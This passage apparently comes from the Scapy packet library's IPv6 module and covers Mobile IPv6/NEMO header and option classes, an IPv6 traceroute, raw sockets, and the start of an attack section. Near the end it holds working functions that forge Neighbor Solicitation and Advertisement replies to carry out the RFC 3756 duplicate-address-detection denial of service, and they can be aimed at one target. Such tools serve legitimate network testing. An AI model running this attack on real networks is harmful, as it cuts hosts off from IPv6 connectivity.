2843#############################################################################
2844#############################################################################
2845# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2846#############################################################################
2847#############################################################################
2849# Mobile IPv6 ICMPv6 related classes
2851class ICMPv6HAADRequest(_ICMPv6):
2852 name = 'ICMPv6 Home Agent Address Discovery Request'
2853 fields_desc = [ByteEnumField("type", 144, icmp6types),
2854 ByteField("code", 0),
2855 XShortField("cksum", None),
2856 XShortField("id", None),
2857 BitEnumField("R", 1, 1, {1: 'MR'}),
2858 XBitField("res", 0, 15)]
2860 def hashret(self):
2861 return struct.pack("!H", self.id) + self.payload.hashret()
2864class ICMPv6HAADReply(_ICMPv6):
2865 name = 'ICMPv6 Home Agent Address Discovery Reply'
2866 fields_desc = [ByteEnumField("type", 145, icmp6types),
2867 ByteField("code", 0),
2868 XShortField("cksum", None),
2869 XShortField("id", None),
2870 BitEnumField("R", 1, 1, {1: 'MR'}),
2871 XBitField("res", 0, 15),
2872 IP6ListField('addresses', None)]
2874 def hashret(self):
2875 return struct.pack("!H", self.id) + self.payload.hashret()
2877 def answers(self, other):
2878 if not isinstance(other, ICMPv6HAADRequest):
2879 return 0
2880 return self.id == other.id
2883class ICMPv6MPSol(_ICMPv6):
2884 name = 'ICMPv6 Mobile Prefix Solicitation'
2885 fields_desc = [ByteEnumField("type", 146, icmp6types),
2886 ByteField("code", 0),
2887 XShortField("cksum", None),
2888 XShortField("id", None),
2889 XShortField("res", 0)]
2891 def _hashret(self):
2892 return struct.pack("!H", self.id)
2895class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2896 name = 'ICMPv6 Mobile Prefix Advertisement'
2897 fields_desc = [ByteEnumField("type", 147, icmp6types),
2898 ByteField("code", 0),
2899 XShortField("cksum", None),
2900 XShortField("id", None),
2901 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
2902 XBitField("res", 0, 14)]
2904 def hashret(self):
2905 return struct.pack("!H", self.id)
2907 def answers(self, other):
2908 return isinstance(other, ICMPv6MPSol)
2910# Mobile IPv6 Options classes
2913_mobopttypes = {2: "Binding Refresh Advice",
2914 3: "Alternate Care-of Address",
2915 4: "Nonce Indices",
2916 5: "Binding Authorization Data",
2917 6: "Mobile Network Prefix (RFC3963)",
2918 7: "Link-Layer Address (RFC4068)",
2919 8: "Mobile Node Identifier (RFC4283)",
2920 9: "Mobility Message Authentication (RFC4285)",
2921 10: "Replay Protection (RFC4285)",
2922 11: "CGA Parameters Request (RFC4866)",
2923 12: "CGA Parameters (RFC4866)",
2924 13: "Signature (RFC4866)",
2925 14: "Home Keygen Token (RFC4866)",
2926 15: "Care-of Test Init (RFC4866)",
2927 16: "Care-of Test (RFC4866)"}
2930class _MIP6OptAlign(Packet):
2931 """ Mobile IPv6 options have alignment requirements of the form x*n+y.
2932 This class is inherited by all MIPv6 options to help in computing the
2933 required Padding for that option, i.e. the need for a Pad1 or PadN
2934 option before it. They only need to provide x and y as class
2935 parameters. (x=0 and y=0 are used when no alignment is required)"""
2937 __slots__ = ["x", "y"]
2939 def alignment_delta(self, curpos):
2940 x = self.x
2941 y = self.y
2942 if x == 0 and y == 0:
2943 return 0
2944 delta = x * ((curpos - y + x - 1) // x) + y - curpos
2945 return delta
2947 def extract_padding(self, p):
2948 return b"", p
2951class MIP6OptBRAdvice(_MIP6OptAlign):
2952 name = 'Mobile IPv6 Option - Binding Refresh Advice'
2953 fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
2954 ByteField('olen', 2),
2955 ShortField('rinter', 0)]
2956 x = 2
2957 y = 0 # alignment requirement: 2n
2960class MIP6OptAltCoA(_MIP6OptAlign):
2961 name = 'MIPv6 Option - Alternate Care-of Address'
2962 fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
2963 ByteField('olen', 16),
2964 IP6Field("acoa", "::")]
2965 x = 8
2966 y = 6 # alignment requirement: 8n+6
2969class MIP6OptNonceIndices(_MIP6OptAlign):
2970 name = 'MIPv6 Option - Nonce Indices'
2971 fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
2972 ByteField('olen', 16),
2973 ShortField('hni', 0),
2974 ShortField('coni', 0)]
2975 x = 2
2976 y = 0 # alignment requirement: 2n
2979class MIP6OptBindingAuthData(_MIP6OptAlign):
2980 name = 'MIPv6 Option - Binding Authorization Data'
2981 fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
2982 ByteField('olen', 16),
2983 BitField('authenticator', 0, 96)]
2984 x = 8
2985 y = 2 # alignment requirement: 8n+2
2988class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963
2989 name = 'NEMO Option - Mobile Network Prefix'
2990 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2991 ByteField("olen", 18),
2992 ByteField("reserved", 0),
2993 ByteField("plen", 64),
2994 IP6Field("prefix", "::")]
2995 x = 8
2996 y = 4 # alignment requirement: 8n+4
2999class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068
3000 name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
3001 fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
3002 ByteField("olen", 7),
3003 ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
3004 ByteField("pad", 0),
3005 MACField("lla", ETHER_ANY)] # Only support ethernet
3006 x = 0
3007 y = 0 # alignment requirement: none
3010class MIP6OptMNID(_MIP6OptAlign): # RFC 4283
3011 name = "MIPv6 Option - Mobile Node Identifier"
3012 fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
3013 FieldLenField("olen", None, length_of="id", fmt="B",
3014 adjust=lambda pkt, x: x + 1),
3015 ByteEnumField("subtype", 1, {1: "NAI"}),
3016 StrLenField("id", "",
3017 length_from=lambda pkt: pkt.olen - 1)]
3018 x = 0
3019 y = 0 # alignment requirement: none
3021# We only support decoding and basic build. Automatic HMAC computation is
3022# too much work for our current needs. It is left to the user (I mean ...
3023# you). --arno
3026class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5)
3027 name = "MIPv6 Option - Mobility Message Authentication"
3028 fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
3029 FieldLenField("olen", None, length_of="authdata", fmt="B",
3030 adjust=lambda pkt, x: x + 5),
3031 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501
3032 2: "MN-AAA authentication mobility option"}), # noqa: E501
3033 IntField("mspi", None),
3034 StrLenField("authdata", "A" * 12,
3035 length_from=lambda pkt: pkt.olen - 5)]
3036 x = 4
3037 y = 1 # alignment requirement: 4n+1
3039# Extracted from RFC 1305 (NTP) :
3040# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3041# in seconds relative to 0h on 1 January 1900. The integer part is in the
3042# first 32 bits and the fraction part in the last 32 bits.
3045class NTPTimestampField(LongField):
3046 def i2repr(self, pkt, x):
3047 if x < ((50 * 31536000) << 32):
3048 return "Some date a few decades ago (%d)" % x
3050 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
3051 # January 1st 1970 :
3052 delta = -2209075761
3053 i = int(x >> 32)
3054 j = float(x & 0xffffffff) * 2.0**-32
3055 res = i + j + delta
3056 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
3058 return "%s (%d)" % (t, x)
3061class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6)
3062 name = "MIPv6 option - Replay Protection"
3063 fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
3064 ByteField("olen", 8),
3065 NTPTimestampField("timestamp", 0)]
3066 x = 8
3067 y = 2 # alignment requirement: 8n+2
3070class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6)
3071 name = "MIPv6 option - CGA Parameters Request"
3072 fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
3073 ByteField("olen", 0)]
3074 x = 0
3075 y = 0 # alignment requirement: none
3077# XXX TODO: deal with CGA param fragmentation and build of defragmented
3078# XXX version. Passing of a big CGAParam structure should be
3079# XXX simplified. Make it hold packets, by the way --arno
3082class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1)
3083 name = "MIPv6 option - CGA Parameters"
3084 fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
3085 FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
3086 StrLenField("cgaparams", "",
3087 length_from=lambda pkt: pkt.olen)]
3088 x = 0
3089 y = 0 # alignment requirement: none
3092class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2)
3093 name = "MIPv6 option - Signature"
3094 fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
3095 FieldLenField("olen", None, length_of="sig", fmt="B"),
3096 StrLenField("sig", "",
3097 length_from=lambda pkt: pkt.olen)]
3098 x = 0
3099 y = 0 # alignment requirement: none
3102class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3)
3103 name = "MIPv6 option - Home Keygen Token"
3104 fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
3105 FieldLenField("olen", None, length_of="hkt", fmt="B"),
3106 StrLenField("hkt", "",
3107 length_from=lambda pkt: pkt.olen)]
3108 x = 0
3109 y = 0 # alignment requirement: none
3112class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4)
3113 name = "MIPv6 option - Care-of Test Init"
3114 fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
3115 ByteField("olen", 0)]
3116 x = 0
3117 y = 0 # alignment requirement: none
3120class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5)
3121 name = "MIPv6 option - Care-of Test"
3122 fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
3123 FieldLenField("olen", None, length_of="cokt", fmt="B"),
3124 StrLenField("cokt", b'\x00' * 8,
3125 length_from=lambda pkt: pkt.olen)]
3126 x = 0
3127 y = 0 # alignment requirement: none
3130class MIP6OptUnknown(_MIP6OptAlign):
3131 name = 'Scapy6 - Unknown Mobility Option'
3132 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
3133 FieldLenField("olen", None, length_of="odata", fmt="B"),
3134 StrLenField("odata", "",
3135 length_from=lambda pkt: pkt.olen)]
3136 x = 0
3137 y = 0 # alignment requirement: none
3139 @classmethod
3140 def dispatch_hook(cls, _pkt=None, *_, **kargs):
3141 if _pkt:
3142 o = orb(_pkt[0]) # Option type
3143 if o in moboptcls:
3144 return moboptcls[o]
3145 return cls
3148moboptcls = {0: Pad1,
3149 1: PadN,
3150 2: MIP6OptBRAdvice,
3151 3: MIP6OptAltCoA,
3152 4: MIP6OptNonceIndices,
3153 5: MIP6OptBindingAuthData,
3154 6: MIP6OptMobNetPrefix,
3155 7: MIP6OptLLAddr,
3156 8: MIP6OptMNID,
3157 9: MIP6OptMsgAuth,
3158 10: MIP6OptReplayProtection,
3159 11: MIP6OptCGAParamsReq,
3160 12: MIP6OptCGAParams,
3161 13: MIP6OptSignature,
3162 14: MIP6OptHomeKeygenToken,
3163 15: MIP6OptCareOfTestInit,
3164 16: MIP6OptCareOfTest}
3167# Main Mobile IPv6 Classes
3169mhtypes = {0: 'BRR',
3170 1: 'HoTI',
3171 2: 'CoTI',
3172 3: 'HoT',
3173 4: 'CoT',
3174 5: 'BU',
3175 6: 'BA',
3176 7: 'BE',
3177 8: 'Fast BU',
3178 9: 'Fast BA',
3179 10: 'Fast NA'}
3181# From http://www.iana.org/assignments/mobility-parameters
3182bastatus = {0: 'Binding Update accepted',
3183 1: 'Accepted but prefix discovery necessary',
3184 128: 'Reason unspecified',
3185 129: 'Administratively prohibited',
3186 130: 'Insufficient resources',
3187 131: 'Home registration not supported',
3188 132: 'Not home subnet',
3189 133: 'Not home agent for this mobile node',
3190 134: 'Duplicate Address Detection failed',
3191 135: 'Sequence number out of window',
3192 136: 'Expired home nonce index',
3193 137: 'Expired care-of nonce index',
3194 138: 'Expired nonces',
3195 139: 'Registration type change disallowed',
3196 140: 'Mobile Router Operation not permitted',
3197 141: 'Invalid Prefix',
3198 142: 'Not Authorized for Prefix',
3199 143: 'Forwarding Setup failed (prefixes missing)',
3200 144: 'MIPV6-ID-MISMATCH',
3201 145: 'MIPV6-MESG-ID-REQD',
3202 146: 'MIPV6-AUTH-FAIL',
3203 147: 'Permanent home keygen token unavailable',
3204 148: 'CGA and signature verification failed',
3205 149: 'Permanent home keygen token exists',
3206 150: 'Non-null home nonce index expected'}
3209class _MobilityHeader(Packet):
3210 name = 'Dummy IPv6 Mobility Header'
3211 overload_fields = {IPv6: {"nh": 135}}
3213 def post_build(self, p, pay):
3214 p += pay
3215 tmp_len = self.len
3216 if self.len is None:
3217 tmp_len = (len(p) - 8) // 8
3218 p = p[:1] + struct.pack("B", tmp_len) + p[2:]
3219 if self.cksum is None:
3220 cksum = in6_chksum(135, self.underlayer, p)
3221 else:
3222 cksum = self.cksum
3223 p = p[:4] + struct.pack("!H", cksum) + p[6:]
3224 return p
3227class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
3228 name = "IPv6 Mobility Header - Generic Message"
3229 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3230 ByteField("len", None),
3231 ByteEnumField("mhtype", None, mhtypes),
3232 ByteField("res", None),
3233 XShortField("cksum", None),
3234 StrLenField("msg", b"\x00" * 2,
3235 length_from=lambda pkt: 8 * pkt.len - 6)]
3238class MIP6MH_BRR(_MobilityHeader):
3239 name = "IPv6 Mobility Header - Binding Refresh Request"
3240 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3241 ByteField("len", None),
3242 ByteEnumField("mhtype", 0, mhtypes),
3243 ByteField("res", None),
3244 XShortField("cksum", None),
3245 ShortField("res2", None),
3246 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3247 _OptionsField("options", [], MIP6OptUnknown, 8,
3248 length_from=lambda pkt: 8 * pkt.len)]
3249 overload_fields = {IPv6: {"nh": 135}}
3251 def hashret(self):
3252 # Hack: BRR, BU and BA have the same hashret that returns the same
3253 # value b"\x00\x08\x09" (concatenation of mhtypes). This is
3254 # because we need match BA with BU and BU with BRR. --arno
3255 return b"\x00\x08\x09"
3258class MIP6MH_HoTI(_MobilityHeader):
3259 name = "IPv6 Mobility Header - Home Test Init"
3260 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3261 ByteField("len", None),
3262 ByteEnumField("mhtype", 1, mhtypes),
3263 ByteField("res", None),
3264 XShortField("cksum", None),
3265 StrFixedLenField("reserved", b"\x00" * 2, 2),
3266 StrFixedLenField("cookie", b"\x00" * 8, 8),
3267 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3268 _OptionsField("options", [], MIP6OptUnknown, 16,
3269 length_from=lambda pkt: 8 * (pkt.len - 1))]
3270 overload_fields = {IPv6: {"nh": 135}}
3272 def hashret(self):
3273 return bytes_encode(self.cookie)
3276class MIP6MH_CoTI(MIP6MH_HoTI):
3277 name = "IPv6 Mobility Header - Care-of Test Init"
3278 mhtype = 2
3280 def hashret(self):
3281 return bytes_encode(self.cookie)
3284class MIP6MH_HoT(_MobilityHeader):
3285 name = "IPv6 Mobility Header - Home Test"
3286 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3287 ByteField("len", None),
3288 ByteEnumField("mhtype", 3, mhtypes),
3289 ByteField("res", None),
3290 XShortField("cksum", None),
3291 ShortField("index", None),
3292 StrFixedLenField("cookie", b"\x00" * 8, 8),
3293 StrFixedLenField("token", b"\x00" * 8, 8),
3294 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3295 _OptionsField("options", [], MIP6OptUnknown, 24,
3296 length_from=lambda pkt: 8 * (pkt.len - 2))]
3297 overload_fields = {IPv6: {"nh": 135}}
3299 def hashret(self):
3300 return bytes_encode(self.cookie)
3302 def answers(self, other):
3303 if (isinstance(other, MIP6MH_HoTI) and
3304 self.cookie == other.cookie):
3305 return 1
3306 return 0
3309class MIP6MH_CoT(MIP6MH_HoT):
3310 name = "IPv6 Mobility Header - Care-of Test"
3311 mhtype = 4
3313 def hashret(self):
3314 return bytes_encode(self.cookie)
3316 def answers(self, other):
3317 if (isinstance(other, MIP6MH_CoTI) and
3318 self.cookie == other.cookie):
3319 return 1
3320 return 0
3323class LifetimeField(ShortField):
3324 def i2repr(self, pkt, x):
3325 return "%d sec" % (4 * x)
3328class MIP6MH_BU(_MobilityHeader):
3329 name = "IPv6 Mobility Header - Binding Update"
3330 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3331 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3332 ByteEnumField("mhtype", 5, mhtypes),
3333 ByteField("res", None),
3334 XShortField("cksum", None),
3335 XShortField("seq", None), # TODO: ShortNonceField
3336 FlagsField("flags", "KHA", 7, "PRMKLHA"),
3337 XBitField("reserved", 0, 9),
3338 LifetimeField("mhtime", 3), # unit == 4 seconds
3339 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3340 _OptionsField("options", [], MIP6OptUnknown, 12,
3341 length_from=lambda pkt: 8 * pkt.len - 4)]
3342 overload_fields = {IPv6: {"nh": 135}}
3344 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3345 return b"\x00\x08\x09"
3347 def answers(self, other):
3348 if isinstance(other, MIP6MH_BRR):
3349 return 1
3350 return 0
3353class MIP6MH_BA(_MobilityHeader):
3354 name = "IPv6 Mobility Header - Binding ACK"
3355 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3356 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3357 ByteEnumField("mhtype", 6, mhtypes),
3358 ByteField("res", None),
3359 XShortField("cksum", None),
3360 ByteEnumField("status", 0, bastatus),
3361 FlagsField("flags", "K", 3, "PRK"),
3362 XBitField("res2", None, 5),
3363 XShortField("seq", None), # TODO: ShortNonceField
3364 XShortField("mhtime", 0), # unit == 4 seconds
3365 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3366 _OptionsField("options", [], MIP6OptUnknown, 12,
3367 length_from=lambda pkt: 8 * pkt.len - 4)]
3368 overload_fields = {IPv6: {"nh": 135}}
3370 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3371 return b"\x00\x08\x09"
3373 def answers(self, other):
3374 if (isinstance(other, MIP6MH_BU) and
3375 other.mhtype == 5 and
3376 self.mhtype == 6 and
3377 other.flags & 0x1 and # Ack request flags is set
3378 self.seq == other.seq):
3379 return 1
3380 return 0
3383_bestatus = {1: 'Unknown binding for Home Address destination option',
3384 2: 'Unrecognized MH Type value'}
3386# TODO: match Binding Error to its stimulus
3389class MIP6MH_BE(_MobilityHeader):
3390 name = "IPv6 Mobility Header - Binding Error"
3391 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3392 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3393 ByteEnumField("mhtype", 7, mhtypes),
3394 ByteField("res", 0),
3395 XShortField("cksum", None),
3396 ByteEnumField("status", 0, _bestatus),
3397 ByteField("reserved", 0),
3398 IP6Field("ha", "::"),
3399 _OptionsField("options", [], MIP6OptUnknown, 24,
3400 length_from=lambda pkt: 8 * (pkt.len - 2))]
3401 overload_fields = {IPv6: {"nh": 135}}
3404_mip6_mhtype2cls = {0: MIP6MH_BRR,
3405 1: MIP6MH_HoTI,
3406 2: MIP6MH_CoTI,
3407 3: MIP6MH_HoT,
3408 4: MIP6MH_CoT,
3409 5: MIP6MH_BU,
3410 6: MIP6MH_BA,
3411 7: MIP6MH_BE}
3414#############################################################################
3415#############################################################################
3416# Traceroute6 #
3417#############################################################################
3418#############################################################################
3420class AS_resolver6(AS_resolver_riswhois):
3421 def _resolve_one(self, ip):
3422 """
3423 overloaded version to provide a Whois resolution on the
3424 embedded IPv4 address if the address is 6to4 or Teredo.
3425 Otherwise, the native IPv6 address is passed.
3426 """
3428 if in6_isaddr6to4(ip): # for 6to4, use embedded @
3429 tmp = inet_pton(socket.AF_INET6, ip)
3430 addr = inet_ntop(socket.AF_INET, tmp[2:6])
3431 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
3432 addr = teredoAddrExtractInfo(ip)[2]
3433 else:
3434 addr = ip
3436 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
3438 if asn.startswith("AS"):
3439 try:
3440 asn = int(asn[2:])
3441 except ValueError:
3442 pass
3444 return ip, asn, desc
3447class TracerouteResult6(TracerouteResult):
3448 __slots__ = []
3450 def show(self):
3451 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501
3452 s.hlim,
3453 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501
3454 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501
3455 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501
3456 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501
3458 def get_trace(self):
3459 trace = {}
3461 for s, r in self.res:
3462 if IPv6 not in s:
3463 continue
3464 d = s[IPv6].dst
3465 if d not in trace:
3466 trace[d] = {}
3468 t = not (ICMPv6TimeExceeded in r or
3469 ICMPv6DestUnreach in r or
3470 ICMPv6PacketTooBig in r or
3471 ICMPv6ParamProblem in r)
3473 trace[d][s[IPv6].hlim] = r[IPv6].src, t
3475 for k in trace.values():
3476 try:
3477 m = min(x for x, y in k.items() if y[1])
3478 except ValueError:
3479 continue
3480 for li in list(k): # use list(): k is modified in the loop
3481 if li > m:
3482 del k[li]
3484 return trace
3486 def graph(self, ASres=AS_resolver6(), **kargs):
3487 TracerouteResult.graph(self, ASres=ASres, **kargs)
3490@conf.commands.register
3491def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
3492 l4=None, timeout=2, verbose=None, **kargs):
3493 """Instant TCP traceroute using IPv6
3494 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
3495 """
3496 if verbose is None:
3497 verbose = conf.verb
3499 if l4 is None:
3500 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501
3501 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501
3502 else:
3503 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
3504 timeout=timeout, verbose=verbose, **kargs)
3506 a = TracerouteResult6(a.res)
3508 if verbose:
3509 a.show()
3511 return a, b
3513#############################################################################
3514#############################################################################
3515# Sockets #
3516#############################################################################
3517#############################################################################
3520if not WINDOWS:
3521 from scapy.supersocket import L3RawSocket
3523 class L3RawSocket6(L3RawSocket):
3524 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501
3525 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501
3526 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501
3527 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
3528 self.iface = iface
3531def IPv6inIP(dst='203.178.135.36', src=None):
3532 _IPv6inIP.dst = dst
3533 _IPv6inIP.src = src
3534 if not conf.L3socket == _IPv6inIP:
3535 _IPv6inIP.cls = conf.L3socket
3536 else:
3537 del conf.L3socket
3538 return _IPv6inIP
3541class _IPv6inIP(SuperSocket):
3542 dst = '127.0.0.1'
3543 src = None
3544 cls = None
3546 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501
3547 SuperSocket.__init__(self, family, type, proto)
3548 self.worker = self.cls(**args)
3550 def set(self, dst, src=None):
3551 _IPv6inIP.src = src
3552 _IPv6inIP.dst = dst
3554 def nonblock_recv(self):
3555 p = self.worker.nonblock_recv()
3556 return self._recv(p)
3558 def recv(self, x):
3559 p = self.worker.recv(x)
3560 return self._recv(p, x)
3562 def _recv(self, p, x=MTU):
3563 if p is None:
3564 return p
3565 elif isinstance(p, IP):
3566 # TODO: verify checksum
3567 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
3568 if isinstance(p.payload, IPv6):
3569 return p.payload
3570 return p
3572 def send(self, x):
3573 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501
3576#############################################################################
3577#############################################################################
3578# Neighbor Discovery Protocol Attacks #
3579#############################################################################
3580#############################################################################
3582def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
3583 tgt_filter=None, reply_mac=None):
3584 """
3585 Internal generic helper accepting a specific callback as first argument,
3586 for NS or NA reply. See the two specific functions below.
3587 """
3589 def is_request(req, mac_src_filter, tgt_filter):
3590 """
3591 Check if packet req is a request
3592 """
3594 # Those simple checks are based on Section 5.4.2 of RFC 4862
3595 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3596 return 0
3598 # Get and compare the MAC address
3599 mac_src = req[Ether].src
3600 if mac_src_filter and mac_src != mac_src_filter:
3601 return 0
3603 # Source must be the unspecified address
3604 if req[IPv6].src != "::":
3605 return 0
3607 # Check destination is the link-local solicited-node multicast
3608 # address associated with target address in received NS
3609 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3610 if tgt_filter and tgt != tgt_filter:
3611 return 0
3612 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
3613 expected_snma = in6_getnsma(tgt)
3614 if received_snma != expected_snma:
3615 return 0
3617 return 1
3619 if not iface:
3620 iface = conf.iface
3622 # To prevent sniffing our own traffic
3623 if not reply_mac:
3624 reply_mac = get_if_hwaddr(iface)
3625 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3627 sniff(store=0,
3628 filter=sniff_filter,
3629 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3630 prn=lambda x: reply_callback(x, reply_mac, iface),
3631 iface=iface)
3634def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
3635 reply_mac=None):
3636 """
3637 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3638 3756. This is done by listening incoming NS messages sent from the
3639 unspecified address and sending a NS reply for the target address,
3640 leading the peer to believe that another node is also performing DAD
3641 for that address.
3643 By default, the fake NS sent to create the DoS uses:
3644 - as target address the target address found in received NS.
3645 - as IPv6 source address: the unspecified address (::).
3646 - as IPv6 destination address: the link-local solicited-node multicast
3647 address derived from the target address in received NS.
3648 - the mac address of the interface as source (or reply_mac, see below).
3649 - the multicast mac address derived from the solicited node multicast
3650 address used as IPv6 destination address.
3652 Following arguments can be used to change the behavior:
3654 iface: a specific interface (e.g. "eth0") of the system on which the
3655 DoS should be launched. If None is provided conf.iface is used.
3657 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3658 Only NS messages received from this source will trigger replies.
3659 This allows limiting the effects of the DoS to a single target by
3660 filtering on its mac address. The default value is None: the DoS
3661 is not limited to a specific mac address.
3663 tgt_filter: Same as previous but for a specific target IPv6 address for
3664 received NS. If the target address in the NS message (not the IPv6
3665 destination address) matches that address, then a fake reply will
3666 be sent, i.e. the emitter will be a target of the DoS.
3668 reply_mac: allow specifying a specific source mac address for the reply,
3669 i.e. to prevent the use of the mac address of the interface.
3670 """
3672 def ns_reply_callback(req, reply_mac, iface):
3673 """
3674 Callback that reply to a NS by sending a similar NS
3675 """
3677 # Let's build a reply and send it
3678 mac = req[Ether].src
3679 dst = req[IPv6].dst
3680 tgt = req[ICMPv6ND_NS].tgt
3681 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501
3682 sendp(rep, iface=iface, verbose=0)
3684 print("Reply NS for target address %s (received from %s)" % (tgt, mac))
3686 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
3687 tgt_filter, reply_mac)
3690def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
3691 reply_mac=None):
3692 """
3693 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3694 3756. This is done by listening incoming NS messages *sent from the
3695 unspecified address* and sending a NA reply for the target address,
3696 leading the peer to believe that another node is also performing DAD
3697 for that address.
3699 By default, the fake NA sent to create the DoS uses:
3700 - as target address the target address found in received NS.
3701 - as IPv6 source address: the target address found in received NS.
3702 - as IPv6 destination address: the link-local solicited-node multicast
3703 address derived from the target address in received NS.
3704 - the mac address of the interface as source (or reply_mac, see below).
3705 - the multicast mac address derived from the solicited node multicast
3706 address used as IPv6 destination address.
3707 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
3708 with the mac address used as source of the NA.
3710 Following arguments can be used to change the behavior:
3712 iface: a specific interface (e.g. "eth0") of the system on which the
3713 DoS should be launched. If None is provided conf.iface is used.
3715 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3716 Only NS messages received from this source will trigger replies.
3717 This allows limiting the effects of the DoS to a single target by
3718 filtering on its mac address. The default value is None: the DoS
3719 is not limited to a specific mac address.
3721 tgt_filter: Same as previous but for a specific target IPv6 address for
3722 received NS. If the target address in the NS message (not the IPv6
3723 destination address) matches that address, then a fake reply will
3724 be sent, i.e. the emitter will be a target of the DoS.
3726 reply_mac: allow specifying a specific source mac address for the reply,
3727 i.e. to prevent the use of the mac address of the interface. This
3728 address will also be used in the Target Link-Layer Address option.
3729 """
